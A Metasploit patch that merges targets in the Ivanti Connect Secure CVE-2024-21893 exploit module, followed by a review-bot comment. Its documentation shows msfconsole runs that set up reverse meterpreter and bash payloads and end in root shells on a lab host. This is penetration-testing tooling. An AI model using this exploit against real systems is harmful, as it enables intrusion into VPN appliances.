From 1f292c8a73056f7a11bb5d517e42c19b4c0590c9 Mon Sep 17 00:00:00 2001
From: sfewer-r7
Date: Fri, 9 Feb 2024 09:26:08 +0000
Subject: [PATCH] remove the linux and unix targets in favor of a single automatic target
---
 ...vanti_connect_secure_rce_cve_2024_21893.md | 87 +++++++++++--------
 ...vanti_connect_secure_rce_cve_2024_21893.rb | 30 ++-----
 2 files changed, 59 insertions(+), 58 deletions(-)
diff --git a/documentation/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893.md b/documentation/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893.md
index a1dc84db62..6eee777eb2 100644
--- a/documentation/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893.md
+++ b/documentation/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893.md
@@ -20,22 +20,19 @@ below steps are for HyperV, but it should be very similar to install on VMWare. 1. Start msfconsole 2. `use exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893` 3. `set RHOST ` -4. `set target 0` -5. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp` -6. `check` -7. `exploit` +4. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp` +5. `check` +6. `exploit` ## Scenarios -To support a broad set of available payloads, we support both a Linux target and a Unix Target. This allows for native +To support a broad set of available payloads, we support both the Linux and Unix platforms. This allows for native Linux payloads to be used, but also payloads like Python meterpreter or a Bash shell. -### Linux Target +### Automatic (Linux Payload) ``` msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set RHOST 192.168.86.111 RHOST => 192.168.86.111 -msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set target 0 -target => 0 msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp PAYLOAD => cmd/linux/http/x64/meterpreter/reverse_tcp msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > show options 
@@ -44,33 +41,48 @@ Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893): Name Current Setting Required Description ---- --------------- -------- ----------- - Proxies no A proxy chain of format type:host:port[,type:host:port][...] - RHOSTS 192.168.86.111 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html + Proxies no A proxy chain of format type:host:port[ + ,type:host:port][...] + RHOSTS 192.168.86.111 yes The target host(s), see https://docs.me + tasploit.com/docs/using-metasploit/basi + cs/using-metasploit.html RPORT 443 yes The target port (TCP) - SSL true no Negotiate SSL/TLS for outgoing connections + SSL true no Negotiate SSL/TLS for outgoing connecti + ons VHOST no HTTP server virtual host Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp): - Name Current Setting Required Description - ---- --------------- -------- ----------- - FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) - FETCH_DELETE false yes Attempt to delete the binary after execution - FETCH_FILENAME BiLTwvbxndD no Name to use on remote system when storing payload; cannot contain spaces. - FETCH_SRVHOST no Local IP to use for serving payload - FETCH_SRVPORT 8080 yes Local port to use for serving payload - FETCH_URIPATH no Local URI to use for serving payload - FETCH_WRITABLE_DIR /tmp yes Remote writable dir to store payload; cannot contain spaces. - LHOST eth0 yes The listen address (an interface may be specified) - LPORT 4444 yes The listen port + Name Current Setting Required Description + ---- --------------- -------- ----------- + FETCH_COMMAND CURL yes Command to fetch payload (Acc + epted: CURL, FTP, TFTP, TNFTP + , WGET) + FETCH_DELETE false yes Attempt to delete the binary + after execution + FETCH_FILENAME XMZdmHhNxYx no Name to use on remote system + when storing payload; cannot + contain spaces. 
+ FETCH_SRVHOST no Local IP to use for serving p + ayload + FETCH_SRVPORT 8080 yes Local port to use for serving + payload + FETCH_URIPATH no Local URI to use for serving + payload + FETCH_WRITABLE_DI /tmp yes Remote writable dir to store + R payload; cannot contain space + s. + LHOST eth0 yes The listen address (an interf + ace may be specified) + LPORT 4444 yes The listen port Exploit target: Id Name -- ---- - 0 Linux Command + 0 Automatic @@ -84,7 +96,7 @@ msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > exploit [*] Running automatic check ("set AutoCheck false" to disable) [!] The service is running, but could not be validated. [*] Sending stage (3045380 bytes) to 192.168.86.111 -[*] Meterpreter session 4 opened (192.168.86.42:4444 -> 192.168.86.111:49328) at 2024-02-06 11:38:33 +0000 +[*] Meterpreter session 3 opened (192.168.86.42:4444 -> 192.168.86.111:45734) at 2024-02-09 09:21:59 +0000 meterpreter > getuid Server username: root @@ -104,17 +116,15 @@ export DSREL_DEPS=ive export DSREL_BUILDNUM=1647 export DSREL_COMMENT="R1" meterpreter > exit -[*] Shutting down session: 4 +[*] Shutting down session: 3 -[*] 192.168.86.111 - Meterpreter session 4 closed. Reason: User exit +[*] 192.168.86.111 - Meterpreter session 3 closed. Reason: Died msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > ``` -### Unix Target +### Automatic (Unix Payload) ``` -msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set target 1 -target => 1 msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set PAYLOAD cmd/unix/reverse_bash PAYLOAD => cmd/unix/reverse_bash msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > show options 
@@ -123,10 +133,14 @@ Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893): Name Current Setting Required Description ---- --------------- -------- ----------- - Proxies no A proxy chain of format type:host:port[,type:host:port][...] - RHOSTS 192.168.86.111 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html + Proxies no A proxy chain of format type:host:port[ + ,type:host:port][...] + RHOSTS 192.168.86.111 yes The target host(s), see https://docs.me + tasploit.com/docs/using-metasploit/basi + cs/using-metasploit.html RPORT 443 yes The target port (TCP) - SSL true no Negotiate SSL/TLS for outgoing connections + SSL true no Negotiate SSL/TLS for outgoing connecti + ons VHOST no HTTP server virtual host @@ -134,7 +148,8 @@ Payload options (cmd/unix/reverse_bash): Name Current Setting Required Description ---- --------------- -------- ----------- - LHOST eth0 yes The listen address (an interface may be specified) + LHOST eth0 yes The listen address (an interface may be s + pecified) LPORT 4444 yes The listen port @@ -142,7 +157,7 @@ Exploit target: Id Name -- ---- - 1 Unix Command + 0 Automatic @@ -155,7 +170,7 @@ msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > exploit [*] Started reverse TCP handler on 192.168.86.42:4444 [*] Running automatic check ("set AutoCheck false" to disable) [!] The service is running, but could not be validated. -[*] Command shell session 5 opened (192.168.86.42:4444 -> 192.168.86.111:49330) at 2024-02-06 11:39:45 +0000 +[*] Command shell session 4 opened (192.168.86.42:4444 -> 192.168.86.111:45736) at 2024-02-09 09:23:15 +0000 id uid=0(root) gid=0(root) groups=0(root) @@ -169,6 +184,6 @@ export DSREL_DEPS=ive export DSREL_BUILDNUM=1647 export DSREL_COMMENT="R1" exit -[*] 192.168.86.111 - Command shell session 5 closed. +[*] 192.168.86.111 - Command shell session 4 closed. msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > ``` 
diff --git a/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2024_21893.rb b/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2024_21893.rb
index 96fd14c74d..a32b2496a3 100644
--- a/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2024_21893.rb
+++ b/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2024_21893.rb
@@ -39,28 +39,14 @@ class MetasploitModule < Msf::Exploit::Remote
 'Arch' => [ARCH_CMD],
 'Privileged' => true, # Code execution as root.
 'Targets' => [
- [
- # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:
- # cmd/linux/http/x64/meterpreter/reverse_tcp
- # cmd/linux/http/x64/shell/reverse_tcp
- # cmd/linux/http/x86/shell/reverse_tcp
- 'Linux Command',
- {
- 'Platform' => 'linux',
- 'Arch' => [ARCH_CMD]
- },
- ],
- [
- # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:
- # cmd/unix/python/meterpreter/reverse_tcp
- # cmd/unix/reverse_bash
- # cmd/unix/reverse_python
- 'Unix Command',
- {
- 'Platform' => 'unix',
- 'Arch' => [ARCH_CMD]
- },
- ]
+ # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:
+ # cmd/linux/http/x64/meterpreter/reverse_tcp
+ # cmd/linux/http/x64/shell/reverse_tcp
+ # cmd/linux/http/x86/shell/reverse_tcp
+ # cmd/unix/python/meterpreter/reverse_tcp
+ # cmd/unix/reverse_bash
+ # cmd/unix/reverse_python
+ ['Automatic', {}]
 ],
 'DefaultOptions' => {
 'RPORT' => 443,
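Review bot: With both per-target `'Platform'` entries removed, the empty options hash in `['Automatic', {}]` leaves payload compatibility entirely to the module-level metadata, and only `'Arch' => [ARCH_CMD]` is visible in this hunk. If the module-level `'Platform'` key (above the hunk, not shown) does not list both `'unix'` and `'linux'`, one of the two payload families named in the comment would no longer be selectable, so that line is worth confirming alongside this change. The merged comment also loses the platform grouping the old targets gave it; a short heading above each list, such as `# Linux fetch payloads:` and `# Unix command payloads:`, would keep the tested matrix readable. The info hash begins and ends outside the hunk.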